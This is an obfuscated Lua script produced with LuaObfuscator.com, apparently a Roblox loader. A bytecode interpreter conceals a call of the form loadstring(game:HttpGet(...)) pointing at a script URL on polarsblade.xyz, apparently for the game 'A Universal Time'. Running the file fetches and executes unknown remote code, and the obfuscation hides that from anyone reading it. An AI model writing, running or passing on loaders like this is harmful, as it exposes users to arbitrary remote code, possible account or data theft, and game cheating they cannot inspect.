--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=v2(v0(v30,16));if v19 then local v110=v5(v86,v19);v19=nil;return v110;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(1065 -(68 + 997)) -0 ;local v88;while true do if (v87==(0 -(1270 -(226 + 1044)))) then v88=(v31/(((12 -9) -1)^(v32-(2 -1))))%((621 -((672 -(32 + 85)) + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(360 + 7 + 201)))) + (928 -(214 + 713)))) ;return v88-(v88%(1 + 0)) ;end end else local v89=0 + 0 ;local v90;while true do if (v89==(877 -(282 + 595))) then v90=2^(v32-(1638 -(1523 + 114))) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or ((0 + 0) -0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=957 -(892 + 65) ;local v36;local v37;while true do if (v35==(2 -1)) then return (v37 * (472 -216)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + ((259 + 93) -((213 -126) + 194 + 69)) ;v35=(719 -538) -(67 + 113) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + 3 + (1 -0) ;return (v41 * ((16779400 -(1069 + 118)) -(915 + 82))) + (v40 * (185570 -(272322 -152288))) + (v39 * ((1506 -817) -433)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1,35 -15 ) * ((2 + 0)^(823 -(368 + (1561 -(116 + 1022)))))) + v42 ;local v46=v20(v43,65 -(183 -139) ,49 -(10 + 8) );local v47=((v20(v43,122 -90 )==(1 + 0)) and  -(443 -(416 + 26))) or (3 -2) ;if (v46==0) then if (v45==0) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=0 -0 ;end elseif (v46==2047) then return ((v45==(438 -(145 + 293))) and (v47 * (((1530 -1099) -(44 + 386))/(1486 -(998 + 488))))) or (v47 * NaN) ;end return v8(v47,v46-(325 + (1557 -(814 + 45))) ) * (v44 + (v45/((2 + 0)^(824 -(201 + 571))))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=886 -(261 + 624) ;end if (v49==(4 -1)) then return v6(v51);end if (v49==((427 + 655) -(1020 + 60))) then v51={};for v111=1424 -(630 + 793) , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=9 -6 ;end if (v49==1) then v50=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;v49=2;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 1262 -(1091 + 171) ;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(396 -(115 + 281))) then local v117=(function() return 0 -0 ;end)();while true do if (v117==(0 + 0)) then v92=(function() return v93();end)();v94=(function() return nil;end)();v117=(function() return 1;end)();end if ((3 -2)~=v117) then else v91=(function() return  #"{";end)();break;end end end if (v91~= #"]") then else if (v92== #",") then v94=(function() return v93()~=0 ;end)();elseif (v92==(2 + 0)) then v94=(function() return v95();end)();elseif (v92~= #"xnx") then else v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v53=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();while true do if (v102==(374 -(123 + 251))) then local v119=(function() return 0 -0 ;end)();local v120=(function() return;end)();while true do if (v119~=0) then else v120=(function() return 698 -(208 + 490) ;end)();while true do if (v120==(867 -(550 + 317))) then local v153=(function() return 0 -0 ;end)();while true do if (v153~=(0 + 0)) then else v99[v100-#"/" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"|",v58 do FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67=(function() return v52(FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67);end)();end v57[ #"-19"]=(function() return v21();end)();for v68= #":",v23() do local v69=(function() return v21();end)();if (v20(v69, #" ", #"|")==(836 -(660 + 176))) then local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106==(288 -(134 + 151))) then if (v20(v108, #"19(", #"19(")== #",") then v109[ #"http"]=(function() return v59[v109[ #"0313"]];end)();end v54[v68]=(function() return v109;end)();break;end if ((1666 -(970 + 695))~=v106) then else local v122=(function() return 0;end)();while true do if (v122~=(202 -(14 + 188))) then else local v132=(function() return 0 -0 ;end)();while true do if (v132==1) then v122=(function() return 1991 -(582 + 1408) ;end)();break;end if (v132~=0) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==0) then local v171=(function() return 0 -0 ;end)();local v172=(function() return;end)();while true do if (v171==(0 -0)) then v172=(function() return 0 -0 ;end)();while true do if (v172~=(1824 -(1195 + 629))) then else v109[ #"xxx"]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"}") then v109[ #"nil"]=(function() return v23();end)();elseif (v107==(677 -(534 + 141))) then v109[ #"91("]=(function() return v23() -((1 + 1)^(20 -4)) ;end)();elseif (v107~= #"xnx") then else local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177~=(0 + 0)) then else v178=(function() return 0 + 0 ;end)();while true do if (v178==(0 + 0)) then v109[ #"-19"]=(function() return v23() -(2^(11 + 5)) ;end)();v109[ #"?id="]=(function() return v22();end)();break;end end break;end end end v132=(function() return 1 -0 ;end)();end end end if ((1 -0)==v122) then v106=(function() return 3 -1 ;end)();break;end end end if (v106~=2) then else if (v20(v108, #"!", #":")== #"<") then v109[1 + 1 ]=(function() return v59[v109[1638 -(1373 + 263) ]];end)();end if (v20(v108,1002 -(451 + 549) ,1 + 1 )~= #":") then else v109[ #"19("]=(function() return v59[v109[ #"91("]];end)();end v106=(function() return 3;end)();end if ((0 -0)~=v106) then else v107=(function() return v20(v69,2 -0 , #"xxx");end)();v108=(function() return v20(v69, #"asd1",16 -10 );end)();v106=(function() return 1 + 0 ;end)();end end end end for v70= #">",v23() do v55,v70,v28=(function() return v53(v55,v70,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[2 -0 ];local v66=v61[7 -(2 + 2) ];return function(...) local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=342 -(218 + 123) ;local v76= -(585 -(57 + 527));local v77={};local v78={...};local v79=v12("#",...) -((225 -121) -(17 + 86)) ;local v80={};local v81={};for v103=0 + 0 ,v79 do if (v103>=v73) then v77[v103-v73 ]=v78[v103 + ((2 -1) -0) ];else v81[v103]=v78[v103 + 1 + 0 ];end end local v82=(v79-v73) + (2 -1) ;local v83;local v84;while true do v83=v71[v75];v84=v83[561 -(306 + 254) ];if (v84<=(1 + 5)) then if (v84<=(168 -(122 + 44))) then if (v84<=(0 -0)) then local v126=1467 -(262 + 637 + 568) ;local v127;local v128;while true do if (v126==(1 + 0)) then v81[v127 + 1 + 0 ]=v128;v81[v127]=v128[v83[9 -5 ]];break;end if ((518<902) and (v126==(603 -(268 + 335)))) then v127=v83[2 + 0 ];v128=v81[v83[293 -(60 + 230) ]];v126=1258 -(1043 + 214) ;end end elseif (v84==(573 -(426 + 146))) then local v133=v83[1 + (4 -3) ];v81[v133]=v81[v133](v13(v81,v133 + (1213 -(323 + (1642 -(239 + 514)))) ,v76));else v81[v83[(513 + 945) -(282 + 1174) ]]();end elseif (v84<=(815 -(569 + 242))) then if (v84>(8 -5)) then do return;end else v81[v83[(1911 -(797 + 532)) -(361 + 219) ]]=v83[1 + 2 ];end elseif (v84==(1029 -(706 + 232 + 86))) then v81[v83[(423 + 830) -(721 + 530) ]]=v63[v83[1274 -(945 + 326) ]];else v81[v83[4 -(4 -2) ]]=v63[v83[2 + 1 ]];end elseif ((2994>858) and (v84<=(9 + 0))) then if ((v84<=(707 -(271 + 429))) or (3755<=915)) then local v129=0 + 0 ;local v130;local v131;while true do if (v129==(0 + 0)) then v130=v83[1502 -(1408 + 92) ];v131=v81[v83[1 + 2 ]];v129=739 -(542 + (1398 -(373 + 829))) ;end if ((1087 -(461 + 625))==v129) then v81[v130 + (1289 -(993 + 295)) ]=v131;v81[v130]=v131[v83[1 + (734 -(476 + 255)) ]];break;end end elseif (v84==(1179 -(418 + 753))) then do return;end else local v141=v83[1 + 1 ];local v142,v143=v74(v81[v141](v13(v81,v141 + 1 + 0 ,v83[(1131 -(369 + 761)) + 2 ])));v76=(v143 + v141) -(1552 -(1126 + 425)) ;local v144=0 + 0 ;for v164=v141,v76 do v144=v144 + 1 + 0 + 0 ;v81[v164]=v142[v144];end end elseif ((3946>3743) and (v84<=(540 -(406 + 123)))) then if ((v84==((52 -23) -(35 -16))) or (1335>=3306)) then local v145=v83[379 -(142 + 235) ];local v146,v147=v74(v81[v145](v13(v81,v145 + ((2008 -(64 + 174)) -(250 + 1499 + 20)) ,v83[1 + 2 ])));v76=(v147 + v145) -(1323 -(1249 + 73)) ;local v148=0 + 0 ;for v167=v145,v76 do v148=v148 + 1 ;v81[v167]=v146[v148];end else v81[v83[1147 -(466 + 679) ]]();end elseif ((4844>2253) and (v84==(28 -16))) then v81[v83[2]]=v83[8 -5 ];else local v151=v83[1902 -((156 -50) + 1794) ];v81[v151]=v81[v151](v13(v81,v151 + 1 + 0 ,v76));end v75=v75 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032E3O00682O7470733A2O2F706F6C617273626C6164652E78797A2F736372697074732F61756E6976657273616C74696D6500083O0012063O00013O001206000100023O002007000100010003001203000300044O000A000100034O00015O00022O00023O000100012O00043O00017O00",v9(),...);
